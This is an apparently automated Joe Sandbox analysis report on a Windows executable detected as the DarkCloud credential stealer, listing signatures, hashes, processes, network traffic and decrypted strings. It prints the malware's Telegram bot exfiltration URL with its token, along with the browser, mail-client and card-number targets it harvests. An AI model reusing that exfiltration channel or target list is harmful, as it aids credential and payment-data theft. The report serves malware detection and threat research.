Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
AGrsqxaSjd.exe

Overview

General Information

Sample name:AGrsqxaSjd.exe
renamed because original name is a hash value
Original sample name:02409c8e60592f537c66f9faf8137c6ad71bfa81884107f926c4f9a69429144e.exe
Analysis ID:1571529
MD5:065753739a03f973e392ff9d2e744d44
SHA1:404470202a947ced4f89674856b819f1ae183f5c
SHA256:02409c8e60592f537c66f9faf8137c6ad71bfa81884107f926c4f9a69429144e
Tags:exeuser-adrian__luca
Infos:

Detection

DarkCloud
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected DarkCloud
AI detected suspicious sample
Machine Learning detection for sample
PE file has a writeable .text section
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Writes or reads registry keys via WMI
Contains functionality to retrieve information about pressed keystrokes
Detected potential crypto function
Found large amount of non-executed APIs
IP address seen in connection with other malware
May check the online IP address of the machine
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • AGrsqxaSjd.exe (PID: 7416 cmdline: "C:\Users\user\Desktop\AGrsqxaSjd.exe" MD5: 065753739A03F973E392FF9D2E744D44)
    • WmiPrvSE.exe (PID: 7536 cmdline: C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding MD5: 64ACA4F48771A5BA50CD50F2410632AD)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
DarkCloud StealerStealer is written in Visual Basic.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.darkcloud
{"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot8136579075:AAGj0tA4jaUAY9OKp-x5cJn4qOrj2emlQuE/sendMessage?chat_id=7309975149"}
SourceRuleDescriptionAuthorStrings
AGrsqxaSjd.exeJoeSecurity_DarkCloudYara detected DarkCloudJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000000.1328576742.0000000000401000.00000080.00000001.01000000.00000003.sdmpJoeSecurity_DarkCloudYara detected DarkCloudJoe Security
      00000000.00000002.2571034417.0000000000401000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_DarkCloudYara detected DarkCloudJoe Security
        Process Memory Space: AGrsqxaSjd.exe PID: 7416JoeSecurity_DarkCloudYara detected DarkCloudJoe Security
          Process Memory Space: AGrsqxaSjd.exe PID: 7416JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            SourceRuleDescriptionAuthorStrings
            0.2.AGrsqxaSjd.exe.400000.0.unpackJoeSecurity_DarkCloudYara detected DarkCloudJoe Security
              0.0.AGrsqxaSjd.exe.400000.0.unpackJoeSecurity_DarkCloudYara detected DarkCloudJoe Security
                No Sigma rule has matched
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-09T14:31:07.011552+010028032742Potentially Bad Traffic192.168.2.949712162.55.60.280TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: AGrsqxaSjd.exeAvira: detected
                Source: AGrsqxaSjd.exeMalware Configuration Extractor: DarkCloud {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot8136579075:AAGj0tA4jaUAY9OKp-x5cJn4qOrj2emlQuE/sendMessage?chat_id=7309975149"}
                Source: AGrsqxaSjd.exeReversingLabs: Detection: 84%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability
                Source: AGrsqxaSjd.exeJoe Sandbox ML: detected
                Source: AGrsqxaSjd.exeString decryptor: Cookies
                Source: AGrsqxaSjd.exeString decryptor: \Default\Login Data
                Source: AGrsqxaSjd.exeString decryptor: \Login Data
                Source: AGrsqxaSjd.exeString decryptor: Password :
                Source: AGrsqxaSjd.exeString decryptor: //setting[@name='Password']/value
                Source: AGrsqxaSjd.exeString decryptor: Software\Martin Prikryl\WinSCP 2\Sessions
                Source: AGrsqxaSjd.exeString decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: AGrsqxaSjd.exeString decryptor: SMTP Email Address
                Source: AGrsqxaSjd.exeString decryptor: NNTP Email Address
                Source: AGrsqxaSjd.exeString decryptor: Email
                Source: AGrsqxaSjd.exeString decryptor: HTTPMail User Name
                Source: AGrsqxaSjd.exeString decryptor: HTTPMail Server
                Source: AGrsqxaSjd.exeString decryptor: ^([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})$
                Source: AGrsqxaSjd.exeString decryptor: Password
                Source: AGrsqxaSjd.exeString decryptor: ^(?!:\/\/)([a-zA-Z0-9-_]+\.)[a-zA-Z0-9][a-zA-Z0-9-_]+\.[a-zA-Z]{2,11}?$
                Source: AGrsqxaSjd.exeString decryptor: ^3[47][0-9]{13}$
                Source: AGrsqxaSjd.exeString decryptor: ^(6541|6556)[0-9]{12}$
                Source: AGrsqxaSjd.exeString decryptor: ^389[0-9]{11}$
                Source: AGrsqxaSjd.exeString decryptor: ^3(?:0[0-5]|[68][0-9])[0-9]{11}$
                Source: AGrsqxaSjd.exeString decryptor: ^63[7-9][0-9]{13}$
                Source: AGrsqxaSjd.exeString decryptor: ^(?:2131|1800|35\\d{3})\\d{11}$
                Source: AGrsqxaSjd.exeString decryptor: ^9[0-9]{15}$
                Source: AGrsqxaSjd.exeString decryptor: ^(6304|6706|6709|6771)[0-9]{12,15}$
                Source: AGrsqxaSjd.exeString decryptor: ^(5018|5020|5038|6304|6759|6761|6763)[0-9]{8,15}$
                Source: AGrsqxaSjd.exeString decryptor: Mastercard
                Source: AGrsqxaSjd.exeString decryptor: ^(6334|6767)[0-9]{12}|(6334|6767)[0-9]{14}|(6334|6767)[0-9]{15}$
                Source: AGrsqxaSjd.exeString decryptor: ^(4903|4905|4911|4936|6333|6759)[0-9]{12}|(4903|4905|4911|4936|6333|6759)[0-9]{14}|(4903|4905|4911|4936|6333|6759)[0-9]{15}|564182[0-9]{10}|564182[0-9]{12}|564182[0-9]{13}|633110[0-9]{10}|633110[0-9]{12}|633110[0-9]{13}$
                Source: AGrsqxaSjd.exeString decryptor: Visa Card
                Source: AGrsqxaSjd.exeString decryptor: ^(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5][0-9]{14})$
                Source: AGrsqxaSjd.exeString decryptor: Visa Master Card
                Source: AGrsqxaSjd.exeString decryptor: \logins.json
                Source: AGrsqxaSjd.exeString decryptor: \signons.sqlite
                Source: AGrsqxaSjd.exeString decryptor: Foxmail.exe
                Source: AGrsqxaSjd.exeString decryptor: mail\
                Source: AGrsqxaSjd.exeString decryptor: \Accounts\Account.rec0
                Source: AGrsqxaSjd.exeString decryptor: \AccCfg\Accounts.tdat
                Source: AGrsqxaSjd.exeString decryptor: EnableSignature
                Source: AGrsqxaSjd.exeString decryptor: Application : FoxMail
                Source: AGrsqxaSjd.exeString decryptor: encryptedUsername
                Source: AGrsqxaSjd.exeString decryptor: logins
                Source: AGrsqxaSjd.exeString decryptor: encryptedPassword
                Source: AGrsqxaSjd.exeString decryptor: \Default\Cookies
                Source: AGrsqxaSjd.exeString decryptor: \Cookies
                Source: AGrsqxaSjd.exeString decryptor: \cookies.sqlite
                Source: AGrsqxaSjd.exeString decryptor: \cookies.db
                Source: AGrsqxaSjd.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                Source: Binary string: W.pdb4 source: AGrsqxaSjd.exe
                Source: Joe Sandbox ViewIP Address: 162.55.60.2 162.55.60.2
                Source: unknownDNS query: name: showip.net
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49712 -> 162.55.60.2:80
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\AGrsqxaSjd.exeCode function: 0_2_00432D60 __vbaStrMove,__vbaStrCat,__vbaFixstrConstruct,__vbaNew2,__vbaHresultCheckObj,__vbaHresultCheckObj,__vbaStrToAnsi,InternetOpenA,__vbaSetSystemError,__vbaFreeStrList,__vbaFreeStrList,__vbaFreeObj,__vbaStrToAnsi,InternetOpenUrlA,__vbaSetSystemError,__vbaStrToUnicode,__vbaFreeStr,__vbaStrToAnsi,__vbaSetSystemError,__vbaStrToUnicode,__vbaLsetFixstr,__vbaLsetFixstr,__vbaFreeStrList,__vbaStrCopy,__vbaStrToAnsi,InternetReadFile,__vbaStrToUnicode,__vbaLsetFixstr,__vbaFreeStrList,__vbaStrCopy,#631,__vbaStrMove,__vbaLsetFixstr,__vbaStrCat,__vbaStrMove,__vbaFreeStrList,__vbaSetSystemError,#598,__vbaSetSystemError,__vbaStrCopy,__vbaFreeStr,__vbaFreeStr,__vbaFreeStr,0_2_00432D60
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Project1Host: showip.net
                Source: global trafficDNS traffic detected: DNS query: showip.net
                Source: AGrsqxaSjd.exe, 00000000.00000003.1384373852.0000000000734000.00000004.00000020.00020000.00000000.sdmp, AGrsqxaSjd.exe, 00000000.00000003.1384398201.0000000000723000.00000004.00000020.00020000.00000000.sdmp, AGrsqxaSjd.exe, 00000000.00000003.1384339139.0000000003308000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schema.org
                Source: AGrsqxaSjd.exe, 00000000.00000002.2571164744.00000000006A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://showip.net
                Source: AGrsqxaSjd.exe, 00000000.00000003.1384447891.00000000006E2000.00000004.00000020.00020000.00000000.sdmp, AGrsqxaSjd.exe, 00000000.00000002.2571164744.00000000006D4000.00000004.00000020.00020000.00000000.sdmp, AGrsqxaSjd.exe, 00000000.00000002.2571164744.00000000006A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://showip.net/
                Source: AGrsqxaSjd.exe, 00000000.00000003.1384447891.00000000006E2000.00000004.00000020.00020000.00000000.sdmp, AGrsqxaSjd.exe, 00000000.00000002.2571164744.00000000006D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://showip.net/2
                Source: AGrsqxaSjd.exe, 00000000.00000002.2571164744.00000000006A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://showip.netW
                Source: AGrsqxaSjd.exe, 00000000.00000002.2571164744.00000000006A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://showip.netll_
                Source: AGrsqxaSjd.exe, 00000000.00000002.2571164744.0000000000694000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://showip.neto
                Source: AGrsqxaSjd.exe, 00000000.00000003.1384339139.0000000003308000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.maxmind.com
                Source: AGrsqxaSjd.exe, 00000000.00000003.1343067039.000000000069B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: AGrsqxaSjd.exeString found in binary or memory: https://api.telegram.org/bot
                Source: AGrsqxaSjd.exe, 00000000.00000003.1343067039.000000000069B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: AGrsqxaSjd.exe, 00000000.00000003.1343067039.000000000069B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: AGrsqxaSjd.exe, 00000000.00000003.1343067039.000000000069B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: AGrsqxaSjd.exe, 00000000.00000003.1343067039.000000000069B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: AGrsqxaSjd.exe, 00000000.00000003.1343067039.000000000069B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: AGrsqxaSjd.exe, 00000000.00000003.1343067039.000000000069B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: AGrsqxaSjd.exe, 00000000.00000003.1384447891.00000000006FF000.00000004.00000020.00020000.00000000.sdmp, AGrsqxaSjd.exe, 00000000.00000002.2571406087.000000000072B000.00000004.00000020.00020000.00000000.sdmp, AGrsqxaSjd.exe, 00000000.00000003.1384398201.0000000000723000.00000004.00000020.00020000.00000000.sdmp, AGrsqxaSjd.exe, 00000000.00000003.1384421857.000000000070F000.00000004.00000020.00020000.00000000.sdmp, AGrsqxaSjd.exe, 00000000.00000003.1384339139.0000000003308000.00000004.00000020.00020000.00000000.sdmp, AGrsqxaSjd.exe, 00000000.00000002.2571164744.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, AGrsqxaSjd.exe, 00000000.00000003.1384447891.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, AGrsqxaSjd.exe, 00000000.00000002.2571779294.0000000003300000.00000004.00000020.00020000.00000000.sdmp, AGrsqxaSjd.exe, 00000000.00000002.2571164744.00000000006A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fundingchoicesmessages.google.com/i/pub-8790158038613050?ers=1
                Source: AGrsqxaSjd.exe, 00000000.00000003.1384373852.0000000000734000.00000004.00000020.00020000.00000000.sdmp, AGrsqxaSjd.exe, 00000000.00000003.1384398201.0000000000723000.00000004.00000020.00020000.00000000.sdmp, AGrsqxaSjd.exe, 00000000.00000003.1384339139.0000000003308000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://showip.net/
                Source: AGrsqxaSjd.exe, 00000000.00000003.1384373852.0000000000734000.00000004.00000020.00020000.00000000.sdmp, AGrsqxaSjd.exe, 00000000.00000003.1384398201.0000000000723000.00000004.00000020.00020000.00000000.sdmp, AGrsqxaSjd.exe, 00000000.00000003.1384339139.0000000003308000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://showip.net/?checkip=
                Source: AGrsqxaSjd.exe, 00000000.00000003.1384339139.0000000003308000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://unpkg.com/leaflet
                Source: AGrsqxaSjd.exe, 00000000.00000003.1343067039.000000000069B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: AGrsqxaSjd.exe, 00000000.00000003.1343067039.000000000069B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: AGrsqxaSjd.exe, 00000000.00000002.2571406087.000000000072B000.00000004.00000020.00020000.00000000.sdmp, AGrsqxaSjd.exe, 00000000.00000003.1384398201.0000000000723000.00000004.00000020.00020000.00000000.sdmp, AGrsqxaSjd.exe, 00000000.00000003.1384421857.000000000070F000.00000004.00000020.00020000.00000000.sdmp, AGrsqxaSjd.exe, 00000000.00000003.1384339139.0000000003308000.00000004.00000020.00020000.00000000.sdmp, AGrsqxaSjd.exe, 00000000.00000002.2571164744.00000000006A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=G-L6NKT5G6D7
                Source: AGrsqxaSjd.exe, 00000000.00000003.1384339139.0000000003308000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.openstreetmap.org/copyright
                Source: C:\Users\user\Desktop\AGrsqxaSjd.exeCode function: 0_2_00404840 GetAsyncKeyState,0_2_00404840

                System Summary

                barindex
                Source: AGrsqxaSjd.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: C:\Users\user\Desktop\AGrsqxaSjd.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
                Source: C:\Users\user\Desktop\AGrsqxaSjd.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
                Source: C:\Users\user\Desktop\AGrsqxaSjd.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
                Source: C:\Users\user\Desktop\AGrsqxaSjd.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
                Source: C:\Users\user\Desktop\AGrsqxaSjd.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
                Source: C:\Users\user\Desktop\AGrsqxaSjd.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
                Source: C:\Users\user\Desktop\AGrsqxaSjd.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
                Source: C:\Users\user\Desktop\AGrsqxaSjd.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
                Source: C:\Users\user\Desktop\AGrsqxaSjd.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
                Source: C:\Users\user\Desktop\AGrsqxaSjd.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
                Source: C:\Users\user\Desktop\AGrsqxaSjd.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
                Source: C:\Users\user\Desktop\AGrsqxaSjd.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
                Source: C:\Users\user\Desktop\AGrsqxaSjd.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
                Source: C:\Users\user\Desktop\AGrsqxaSjd.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
                Source: C:\Users\user\Desktop\AGrsqxaSjd.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
                Source: C:\Users\user\Desktop\AGrsqxaSjd.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
                Source: C:\Users\user\Desktop\AGrsqxaSjd.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
                Source: C:\Users\user\Desktop\AGrsqxaSjd.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
                Source: C:\Users\user\Desktop\AGrsqxaSjd.exeCode function: 0_2_0040421E0_2_0040421E
                Source: C:\Users\user\Desktop\AGrsqxaSjd.exeCode function: 0_2_00426E800_2_00426E80
                Source: AGrsqxaSjd.exeStatic PE information: Resource name: CUSTOM type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
                Source: AGrsqxaSjd.exeBinary or memory string: OriginalFilenameflagellum.exe vs AGrsqxaSjd.exe
                Source: AGrsqxaSjd.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                Source: AGrsqxaSjd.exeBinary or memory string: C*\AC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Templates\Stub\Project1.vbp
                Source: AGrsqxaSjd.exe, 00000000.00000002.2571057684.000000000043D000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: @@*\AC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Templates\Stub\Project1.vbp Dm
                Source: classification engineClassification label: mal96.troj.spyw.winEXE@2/4@1/1
                Source: C:\Users\user\Desktop\AGrsqxaSjd.exeMutant created: NULL
                Source: AGrsqxaSjd.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: C:\Users\user\Desktop\AGrsqxaSjd.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: AGrsqxaSjd.exeBinary or memory string: SELECT item1 FROM metadata WHERE id = 'password';
                Source: AGrsqxaSjd.exe, 00000000.00000003.1345044578.00000000006A9000.00000004.00000020.00020000.00000000.sdmp, AGrsqxaSjd.exe, 00000000.00000003.1343516703.00000000006AB000.00000004.00000020.00020000.00000000.sdmp, AGrsqxaSjd.exe, 00000000.00000003.1343896243.0000000000689000.00000004.00000020.00020000.00000000.sdmp, LoggraNoUCYctgwnrtnRFCefIupAVHcOBQqsTNNMrZheterostracan.0.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: AGrsqxaSjd.exeReversingLabs: Detection: 84%
                Source: unknownProcess created: C:\Users\user\Desktop\AGrsqxaSjd.exe "C:\Users\user\Desktop\AGrsqxaSjd.exe"
                Source: C:\Users\user\Desktop\AGrsqxaSjd.exeProcess created: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
                Source: C:\Users\user\Desktop\AGrsqxaSjd.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\AGrsqxaSjd.exeSection loaded: msvbvm60.dllJump to behavior
                Source: C:\Users\user\Desktop\AGrsqxaSjd.exeSection loaded: vb6zz.dllJump to behavior
                Source: C:\Users\user\Desktop\AGrsqxaSjd.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\AGrsqxaSjd.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\AGrsqxaSjd.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Users\user\Desktop\AGrsqxaSjd.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Users\user\Desktop\AGrsqxaSjd.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\AGrsqxaSjd.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\Desktop\AGrsqxaSjd.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Users\user\Desktop\AGrsqxaSjd.exeSection loaded: vbscript.dllJump to behavior
                Source: C:\Users\user\Desktop\AGrsqxaSjd.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\AGrsqxaSjd.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\AGrsqxaSjd.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\AGrsqxaSjd.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\AGrsqxaSjd.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\AGrsqxaSjd.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\AGrsqxaSjd.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\AGrsqxaSjd.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\AGrsqxaSjd.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\AGrsqxaSjd.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\AGrsqxaSjd.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\AGrsqxaSjd.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\AGrsqxaSjd.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\AGrsqxaSjd.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\AGrsqxaSjd.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\AGrsqxaSjd.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\AGrsqxaSjd.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\AGrsqxaSjd.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\AGrsqxaSjd.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\AGrsqxaSjd.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\AGrsqxaSjd.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: esscli.dllJump to behavior
                Source: C:\Users\user\Desktop\AGrsqxaSjd.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{EE09B103-97E0-11CF-978F-00A02463E06F}\InprocServer32Jump to behavior
                Source: Binary string: W.pdb4 source: AGrsqxaSjd.exe
                Source: AGrsqxaSjd.exeStatic PE information: real checksum: 0x71304 should be: 0x6db5b
                Source: C:\Users\user\Desktop\AGrsqxaSjd.exeCode function: 0_2_004013B6 push ebp; retf 0_2_004013DD
                Source: C:\Users\user\Desktop\AGrsqxaSjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\AGrsqxaSjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\AGrsqxaSjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\AGrsqxaSjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\AGrsqxaSjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\AGrsqxaSjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\AGrsqxaSjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\AGrsqxaSjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\AGrsqxaSjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\AGrsqxaSjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\AGrsqxaSjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\AGrsqxaSjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\AGrsqxaSjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\AGrsqxaSjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\AGrsqxaSjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\AGrsqxaSjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\AGrsqxaSjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\AGrsqxaSjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\AGrsqxaSjd.exeAPI coverage: 9.4 %
                Source: WebData.0.drBinary or memory string: dev.azure.comVMware20,11696497155j
                Source: WebData.0.drBinary or memory string: global block list test formVMware20,11696497155
                Source: AGrsqxaSjd.exe, 00000000.00000002.2571164744.00000000006B6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8
                Source: WebData.0.drBinary or memory string: turbotax.intuit.comVMware20,11696497155t
                Source: WebData.0.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
                Source: AGrsqxaSjd.exe, 00000000.00000002.2571164744.000000000068F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ictivebrokers.co.inVMware20,11696497155d
                Source: AGrsqxaSjd.exe, 00000000.00000002.2571164744.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, AGrsqxaSjd.exe, 00000000.00000003.1384447891.00000000006F9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: WebData.0.drBinary or memory string: Interactive Brokers - HKVMware20,11696497155]
                Source: WebData.0.drBinary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
